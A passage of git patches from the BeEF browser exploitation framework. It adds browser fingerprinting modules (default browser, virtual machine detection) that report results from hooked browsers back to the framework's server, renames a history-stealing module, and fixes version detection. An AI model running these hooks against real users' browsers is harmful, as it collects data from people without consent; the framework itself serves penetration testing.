-echo -n "Check and install updates for beef (y/N)? "
+echo -n "Check and install updates for BeEF (y/N)? "
 read var
 
 if [ $var = "y" ] ; then
@@ -67,7 +67,7 @@ if [ $var = "y" ] ; then
 fi
 echo ""
 
-echo -n "Check and install updates for mfs and sqlmap (y/N)? "
+echo -n "Check and install updates for msf and sqlmap (y/N)? "
 read var
 
 if [ $var = "y" ] ; then
@@ -81,8 +81,8 @@ fi
  
  
 #
-# Create a shortcut in the users home folder to BeEF, MSF and sqlmap (if they do 
-# not yet exist)
+# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
+# (if they do not yet exist)
 #
 f1="beef"
 if [ -f $f1 ] ; then
@@ -94,7 +94,7 @@ else
 fi
 
 #
-# Prompt the user if they would like start beef
+# Prompt the user if they would like start BeEF
 #
 echo -n "Start BeEF (y/N)? "
 read var
diff --git a/modules/exploits/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js
similarity index 100%
rename from modules/exploits/avant_steal_history/command.js
rename to modules/browser/avant_steal_history/command.js
diff --git a/modules/exploits/avant_steal_history/config.yaml b/modules/browser/avant_steal_history/config.yaml
similarity index 90%
rename from modules/exploits/avant_steal_history/config.yaml
rename to modules/browser/avant_steal_history/config.yaml
index 1121f0db2..ab161494f 100644
--- a/modules/exploits/avant_steal_history/config.yaml
+++ b/modules/browser/avant_steal_history/config.yaml
@@ -17,8 +17,8 @@ beef:
     module:
         avant_steal_history:
             enable: true
-            category: ["Exploits", "XSS"]
-            name: "Avant Browser History Stealing"
+            category: "Browser"
+            name: "Get Visited URLs (Avant Browser)"
             description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
             authors: ["Roberto Suggi Liverani"]
             target:
diff --git a/modules/exploits/avant_steal_history/module.rb b/modules/browser/avant_steal_history/module.rb
similarity index 100%
rename from modules/exploits/avant_steal_history/module.rb
rename to modules/browser/avant_steal_history/module.rb

From df365b74c2525d7a8681f255d8aa86b3ff6c2e74 Mon Sep 17 00:00:00 2001
From: Stefan Schlott <stefan@ploing.de>
Date: Tue, 11 Dec 2012 15:54:41 +0100
Subject: [PATCH 119/397] Fix Javascript errors in Phonegap (see #777)

---
 core/main/client/browser.js | 38 ++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 16ef18b73..1a4418256 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -250,7 +250,7 @@ beef.browser = {
 	 * @example: beef.browser.isC5()
 	 */
 	isC5: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==5)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==5)?true:false);
 	},
 		
 	/**
@@ -258,7 +258,7 @@ beef.browser = {
 	 * @example: beef.browser.isC6()
 	 */
 	isC6: function() {
-		return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==6)?true:false);
+		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==6)?true:false);
 	},
 
 	/**
@@ -266,7 +266,7 @@ beef.browser = {
 	 * @example: beef.browser.isC7()
 	 */
 	isC7: function() {
-		return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==7)?true:false);
+		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==7)?true:false);
 	},
 
 	/**
@@ -274,7 +274,7 @@ beef.browser = {
 	 * @example: beef.browser.isC8()
 	 */
 	isC8: function() {
-		return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==8)?true:false);
+		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==8)?true:false);
 	},
 	
 	/**
@@ -282,7 +282,7 @@ beef.browser = {
 	 * @example: beef.browser.isC9()
 	 */
 	isC9: function() {
-		return (!!window.chrome && !!window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==9)?true:false);
+		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==9)?true:false);
 	},
 	
 	/**
@@ -290,7 +290,7 @@ beef.browser = {
 	 * @example: beef.browser.isC10()
 	 */
 	isC10: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==10)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==10)?true:false);
 	},
 
 	/**
@@ -298,7 +298,7 @@ beef.browser = {
 	 * @example: beef.browser.isC11()
 	 */
 	isC11: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==11)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==11)?true:false);
 	},
 	
 	/**
@@ -306,7 +306,7 @@ beef.browser = {
 	 * @example: beef.browser.isC12()
 	 */
 	isC12: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==12)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==12)?true:false);
 	},
 
 	/**
@@ -314,7 +314,7 @@ beef.browser = {
 	 * @example: beef.browser.isC13()
 	 */
 	isC13: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==13)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==13)?true:false);
 	},
 
 	/**
@@ -322,7 +322,7 @@ beef.browser = {
 	 * @example: beef.browser.isC14()
 	 */
 	isC14: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==14)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==14)?true:false);
 	},
 
 	/**
@@ -330,7 +330,7 @@ beef.browser = {
 	 * @example: beef.browser.isC15()
 	 */
 	isC15: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==15)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==15)?true:false);
 	},
 
 	/**
@@ -338,7 +338,7 @@ beef.browser = {
 	 * @example: beef.browser.isC16()
 	 */
 	isC16: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false);
 	},
 
     /**
@@ -346,7 +346,7 @@ beef.browser = {
      * @example: beef.browser.isC17()
      */
     isC17: function() {
-        return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
     },
 
 	/**
@@ -354,7 +354,7 @@ beef.browser = {
 	 * @example: beef.browser.isC18()
 	 */
 	isC18: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
 	},
 
 	/**
@@ -362,7 +362,7 @@ beef.browser = {
 	 * @example: beef.browser.isC19()
 	 */
 	isC19: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
 	},
 
 	/**
@@ -370,7 +370,7 @@ beef.browser = {
 	 * @example: beef.browser.isC20()
 	 */
 	isC20: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false);
 	},
 
     /**
@@ -378,7 +378,7 @@ beef.browser = {
      * @example: beef.browser.isC21()
      */
     isC21: function() {
-        return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
     },
 
 	/**
@@ -386,7 +386,7 @@ beef.browser = {
 	 * @example: beef.browser.isC22()
 	 */
 	isC22: function() {
-		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
+		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
 	},
 
     /**
@@ -394,7 +394,7 @@ beef.browser = {
      * @example: beef.browser.isC23()
      */
     isC23: function() {
-        return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false);
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false);
     },
 
 	/**

From 7b4d4de3eb43ef5b0db61d7a99abb003a63bacb0 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 13 Dec 2012 18:00:22 +1030
Subject: [PATCH 120/397] Added support for Firefox 17

---
 core/main/client/browser.js | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 16ef18b73..cb32204dc 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -205,12 +205,20 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
 	},
 
+	/**
+	 * Returns true if FF17
+	 * @example: beef.browser.isFF17()
+	 */
+	isFF17: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17();
 	},
 
 	/**
@@ -500,6 +508,7 @@ beef.browser = {
 			FF14:	this.isFF14(),	// Firefox 14
 			FF15:	this.isFF15(),	// Firefox 15
 			FF16:	this.isFF16(),	// Firefox 16
+			FF17:	this.isFF17(),	// Firefox 17
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -568,6 +577,7 @@ beef.browser = {
 		if (this.isFF14())	{ return '14' };	// Firefox 14
 		if (this.isFF15())	{ return '15' };	// Firefox 15
 		if (this.isFF16())	{ return '16' };	// Firefox 16
+		if (this.isFF17())  { return '17' };    // Firefox 17
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7

From 4e7e1129bbefa938bbe0aa0e339b3811c217dcdc Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 13 Dec 2012 18:04:16 +1030
Subject: [PATCH 121/397] Added Detect Default Browser module

---
 .../browser/detect_default_browser/command.js | 24 +++++++++++++++++++
 .../detect_default_browser/config.yaml        | 16 +++++++++++++
 .../browser/detect_default_browser/module.rb  | 14 +++++++++++
 3 files changed, 54 insertions(+)
 create mode 100644 modules/browser/detect_default_browser/command.js
 create mode 100644 modules/browser/detect_default_browser/config.yaml
 create mode 100644 modules/browser/detect_default_browser/module.rb

diff --git a/modules/browser/detect_default_browser/command.js b/modules/browser/detect_default_browser/command.js
new file mode 100644
index 000000000..41b337759
--- /dev/null
+++ b/modules/browser/detect_default_browser/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var mt = document.mimeType;
+
+	if (mt) {
+		if (mt == "Safari Document")       result = "Safari";
+		if (mt == "Firefox HTML Document") result = "Firefox";
+		if (mt == "Chrome HTML Document")  result = "Chrome";
+		if (mt == "HTML Document")         result = "Internet Explorer";
+		if (mt == "Opera Web Document")    result = "Opera";
+	} else {
+		result = "Unknown";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser="+result);
+
+});
+
diff --git a/modules/browser/detect_default_browser/config.yaml b/modules/browser/detect_default_browser/config.yaml
new file mode 100644
index 000000000..c695c224e
--- /dev/null
+++ b/modules/browser/detect_default_browser/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_default_browser:
+            enable: true
+            category: "Browser"
+            name: "Detect Default Browser"
+            description: "This module detects which browser is configured as the default web browser."
+            authors: ["bcoles"]
+            target:
+                 working: ["IE"]
+                 not_working: ["All"]
diff --git a/modules/browser/detect_default_browser/module.rb b/modules/browser/detect_default_browser/module.rb
new file mode 100644
index 000000000..5fd5764d4
--- /dev/null
+++ b/modules/browser/detect_default_browser/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_default_browser < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['browser'] = @datastore['browser'] if not @datastore['browser'].nil?
+		save content
+	end
+
+end

From bdab1028f5c14842599446f7340af40ef31bb13d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 16 Dec 2012 16:22:41 +1030
Subject: [PATCH 122/397] Added Detect Virtual Machine module

---
 .../browser/detect_default_browser/command.js |  4 ++
 .../detect_default_browser/config.yaml        |  2 +-
 modules/host/detect_vm/command.js             | 56 +++++++++++++++++++
 modules/host/detect_vm/config.yaml            | 15 +++++
 modules/host/detect_vm/module.rb              | 14 +++++
 5 files changed, 90 insertions(+), 1 deletion(-)
 create mode 100644 modules/host/detect_vm/command.js
 create mode 100644 modules/host/detect_vm/config.yaml
 create mode 100644 modules/host/detect_vm/module.rb

diff --git a/modules/browser/detect_default_browser/command.js b/modules/browser/detect_default_browser/command.js
index 41b337759..8f004e4f0 100644
--- a/modules/browser/detect_default_browser/command.js
+++ b/modules/browser/detect_default_browser/command.js
@@ -4,6 +4,10 @@
 // See the file 'doc/COPYING' for copying permission
 //
 
+// Written by unsticky
+// Ported to BeEF by bcoles
+// For more information see http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
+
 beef.execute(function() {
 
 	var mt = document.mimeType;
diff --git a/modules/browser/detect_default_browser/config.yaml b/modules/browser/detect_default_browser/config.yaml
index c695c224e..6561949fc 100644
--- a/modules/browser/detect_default_browser/config.yaml
+++ b/modules/browser/detect_default_browser/config.yaml
@@ -10,7 +10,7 @@ beef:
             category: "Browser"
             name: "Detect Default Browser"
             description: "This module detects which browser is configured as the default web browser."
-            authors: ["bcoles"]
+            authors: ["unsticky", "bcoles"]
             target:
                  working: ["IE"]
                  not_working: ["All"]
diff --git a/modules/host/detect_vm/command.js b/modules/host/detect_vm/command.js
new file mode 100644
index 000000000..a22df9951
--- /dev/null
+++ b/modules/host/detect_vm/command.js
@@ -0,0 +1,56 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Written by Jeremiah Grossman
+// Ported to BeEF by bcoles
+// For more information see http://jeremiahgrossman.blogspot.com.au/2009/08/web-pages-detecting-virtualized.html
+
+beef.execute(function() {
+
+	var result;
+	var dimensions = {
+	'320, 200' : '',
+	'320, 240' : '',
+	'640, 480' : '',
+	'800, 480' : '',
+	'768, 576' : '',
+	'854, 480' : '',
+	'1024, 600' : '',
+	'1152, 768' : '',
+	'800, 600' : '',
+	'1024, 768' : '',
+	'1280, 854' : '',
+	'1280, 960' : '',
+	'1280, 1024' : '',
+	'1280, 720' : '',
+	'1280, 768' : '',
+	'1366, 768' : '',
+	'1280, 800' : '',
+	'1440, 900' : '',
+	'1440, 960' : '',
+	'1400, 1050' : '',
+	'1600, 1200' : '',
+	'2048, 1536' : '',
+	'1680, 1050' : '',
+	'1920, 1080' : '',
+	'2048, 1080' : '',
+	'1920, 1200' : '',
+	'2560, 1600' : '',
+	'2560, 2048' : ''
+	};
+
+	var wh = screen.width + ", " + screen.height;
+
+	if (dimensions[wh] != undefined) {
+		result = "Not virtualized";
+	} else {
+		result = "This host is virtualized or uses an unrecognized screen resolution";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
+
+});
+
diff --git a/modules/host/detect_vm/config.yaml b/modules/host/detect_vm/config.yaml
new file mode 100644
index 000000000..8ee182664
--- /dev/null
+++ b/modules/host/detect_vm/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_virtualization:
+            enable: true
+            category: "Host"
+            name: "Detect Virtual Machine"
+            description: "This module uses the host screen resolution as a cheap and easy method to check if the browser is running in a virtual environment.<br/><br/>Unusual screen resolutions, such as those used by wide screen televisions or hand-held devices, may result in false negative results."
+            authors: ["Jeremiah Grossman", "bcoles"]
+            target:
+                 working: ["All"]
diff --git a/modules/host/detect_vm/module.rb b/modules/host/detect_vm/module.rb
new file mode 100644
index 000000000..0ed2c01e3
--- /dev/null
+++ b/modules/host/detect_vm/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_virtualization < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['result'] = @datastore['result'] if not @datastore['result'].nil?
+		save content
+	end
+
+end

From ba5ee180e4f9d66cb916e8b546baaa4e7ed7995f Mon Sep 17 00:00:00 2001
From: Saafan <a.m.saafan@gmail.com>
Date: Sat, 29 Dec 2012 13:33:23 +0200
Subject: [PATCH 123/397] -Updated "Detect Java Support" using the official
 oracle deployment support script to detect if Java is enabled.

---
 core/main/client/browser.js | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index cb32204dc..f5947fa17 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -650,8 +650,16 @@ beef.browser = {
 	 */
 	javaEnabled: function() {
 
-		return (!!window.navigator.javaEnabled());
-	
+        // Cross-browser Java Deployment Toolkit Script
+        // Source: http://java.com/js/deployJava.js
+        var deployJava=function(){var l={core:["id","class","title","style"],i18n:["lang","dir"],events:["onclick","ondblclick","onmousedown","onmouseup","onmouseover","onmousemove","onmouseout","onkeypress","onkeydown","onkeyup"],applet:["codebase","code","name","archive","object","width","height","alt","align","hspace","vspace"],object:["classid","codebase","codetype","data","type","archive","declare","standby","height","width","usemap","name","tabindex","align","border","hspace","vspace"]};var b=l.object.concat(l.core,l.i18n,l.events);var m=l.applet.concat(l.core);function g(n){if(!d.debug){return}if(console.log){console.log(n)}else{alert(n)}}function k(o,n){if(o==null||o.length==0){return true}var q=o.charAt(o.length-1);if(q!="+"&&q!="*"&&(o.indexOf("_")!=-1&&q!="_")){o=o+"*";q="*"}o=o.substring(0,o.length-1);if(o.length>0){var p=o.charAt(o.length-1);if(p=="."||p=="_"){o=o.substring(0,o.length-1)}}if(q=="*"){return(n.indexOf(o)==0)}else{if(q=="+"){return o<=n}}return false}function e(){var n="//java.com/js/webstart.png";try{return document.location.protocol.indexOf("http")!=-1?n:"http:"+n}catch(o){return"http:"+n}}function j(p,o){var n=p.length;for(var q=0;q<n;q++){if(p[q]===o){return true}}return false}function c(n){return j(m,n.toLowerCase())}function i(n){return j(b,n.toLowerCase())}function a(n){if("MSIE"!=deployJava.browserName){return true}if(deployJava.compareVersionToPattern(deployJava.getPlugin().version,["10","0","0"],false,true)){return true}if(n==null){return false}return !k("1.6.0_33+",n)}var d={debug:null,version:"20120801",firefoxJavaVersion:null,myInterval:null,preInstallJREList:null,returnPage:null,brand:null,locale:null,installType:null,EAInstallEnabled:false,EarlyAccessURL:null,getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com",oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit",mimeType:"application/java-deployment-toolkit",launchButtonPNG:e(),browserName:null,browserName2:null,getJREs:function(){var r=new Array();if(this.isPluginInstalled()){var q=this.getPlugin();var n=q.jvms;for(var p=0;p<n.getLength();p++){r[p]=n.get(p).version}}else{var o=this.getBrowser();if(o=="MSIE"){if(this.testUsingActiveX("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingActiveX("1.6.0")){r[0]="1.6.0"}else{if(this.testUsingActiveX("1.5.0")){r[0]="1.5.0"}else{if(this.testUsingActiveX("1.4.2")){r[0]="1.4.2"}else{if(this.testForMSVM()){r[0]="1.1"}}}}}}else{if(o=="Netscape Family"){this.getJPIVersionUsingMimeType();if(this.firefoxJavaVersion!=null){r[0]=this.firefoxJavaVersion}else{if(this.testUsingMimeTypes("1.7")){r[0]="1.7.0"}else{if(this.testUsingMimeTypes("1.6")){r[0]="1.6.0"}else{if(this.testUsingMimeTypes("1.5")){r[0]="1.5.0"}else{if(this.testUsingMimeTypes("1.4.2")){r[0]="1.4.2"}else{if(this.browserName2=="Safari"){if(this.testUsingPluginsArray("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingPluginsArray("1.6")){r[0]="1.6.0"}else{if(this.testUsingPluginsArray("1.5")){r[0]="1.5.0"}else{if(this.testUsingPluginsArray("1.4.2")){r[0]="1.4.2"}}}}}}}}}}}}}if(this.debug){for(var p=0;p<r.length;++p){g("[getJREs()] We claim to have detected Java SE "+r[p])}}return r},installJRE:function(q,o){var n=false;if(this.isPluginInstalled()&&this.isAutoInstallEnabled(q)){var p=false;if(this.isCallbackSupported()){p=this.getPlugin().installJRE(q,o)}else{p=this.getPlugin().installJRE(q)}if(p){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return p}else{return this.installLatestJRE()}},isAutoInstallEnabled:function(n){if(!this.isPluginInstalled()){return false}if(typeof n=="undefined"){n=null}return a(n)},isCallbackSupported:function(){return this.isPluginInstalled()&&this.compareVersionToPattern(this.getPlugin().version,["10","2","0"],false,true)},installLatestJRE:function(p){if(this.isPluginInstalled()&&this.isAutoInstallEnabled()){var q=false;if(this.isCallbackSupported()){q=this.getPlugin().installLatestJRE(p)}else{q=this.getPlugin().installLatestJRE()}if(q){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return q}else{var o=this.getBrowser();var n=navigator.platform.toLowerCase();if((this.EAInstallEnabled=="true")&&(n.indexOf("win")!=-1)&&(this.EarlyAccessURL!=null)){this.preInstallJREList=this.getJREs();if(this.returnPage!=null){this.myInterval=setInterval("deployJava.poll()",3000)}location.href=this.EarlyAccessURL;return false}else{if(o=="MSIE"){return this.IEInstall()}else{if((o=="Netscape Family")&&(n.indexOf("win32")!=-1)){return this.FFInstall()}else{location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")}}return false}}},runApplet:function(o,t,q){if(q=="undefined"||q==null){q="1.1"}var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(this.returnPage==null){this.returnPage=document.location}if(n!=null){var p=this.getBrowser();if(p!="?"){if(this.versionCheck(q+"+")){this.writeAppletTag(o,t)}else{if(this.installJRE(q+"+")){this.refresh();location.href=document.location;this.writeAppletTag(o,t)}}}else{this.writeAppletTag(o,t)}}else{g("[runApplet()] Invalid minimumVersion argument to runApplet():"+q)}},writeAppletTag:function(q,v){var n="<applet ";var p="";var r="</applet>";var w=true;if(null==v||typeof v!="object"){v=new Object()}for(var o in q){if(!c(o)){v[o]=q[o]}else{n+=(" "+o+'="'+q[o]+'"');if(o=="code"){w=false}}}var u=false;for(var t in v){if(t=="codebase_lookup"){u=true}if(t=="object"||t=="java_object"||t=="java_code"){w=false}p+='<param name="'+t+'" value="'+v[t]+'"/>'}if(!u){p+='<param name="codebase_lookup" value="false"/>'}if(w){n+=(' code="dummy"')}n+=">";document.write(n+"\n"+p+"\n"+r)},versionCheck:function(o){var u=0;var w="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";var x=o.match(w);if(x!=null){var q=false;var t=false;var p=new Array();for(var r=1;r<x.length;++r){if((typeof x[r]=="string")&&(x[r]!="")){p[u]=x[r];u++}}if(p[p.length-1]=="+"){t=true;q=false;p.length--}else{if(p[p.length-1]=="*"){t=false;q=true;p.length--}else{if(p.length<4){t=false;q=true}}}var v=this.getJREs();for(var r=0;r<v.length;++r){if(this.compareVersionToPattern(v[r],p,q,t)){return true}}return false}else{var n="Invalid versionPattern passed to versionCheck: "+o;g("[versionCheck()] "+n);alert(n);return false}},isWebStartInstalled:function(q){var p=this.getBrowser();if(p=="?"){return true}if(q=="undefined"||q==null){q="1.4.2"}var o=false;var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(n!=null){o=this.versionCheck(q+"+")}else{g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): "+q);o=this.versionCheck("1.4.2+")}return o},getJPIVersionUsingMimeType:function(){for(var o=0;o<navigator.mimeTypes.length;++o){var p=navigator.mimeTypes[o].type;var n=p.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(n!=null){this.firefoxJavaVersion=n[1];if("Opera"!=this.browserName2){break}}}},launchWebStartApplication:function(q){var n=navigator.userAgent.toLowerCase();this.getJPIVersionUsingMimeType();if(this.isWebStartInstalled("1.7.0")==false){if((this.installJRE("1.7.0+")==false)||((this.isWebStartInstalled("1.7.0")==false))){return false}}var t=null;if(document.documentURI){t=document.documentURI}if(t==null){t=document.URL}var o=this.getBrowser();var p;if(o=="MSIE"){p='<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name="launchjnlp" value="'+q+'"><PARAM name="docbase" value="'+t+'"></object>'}else{if(o=="Netscape 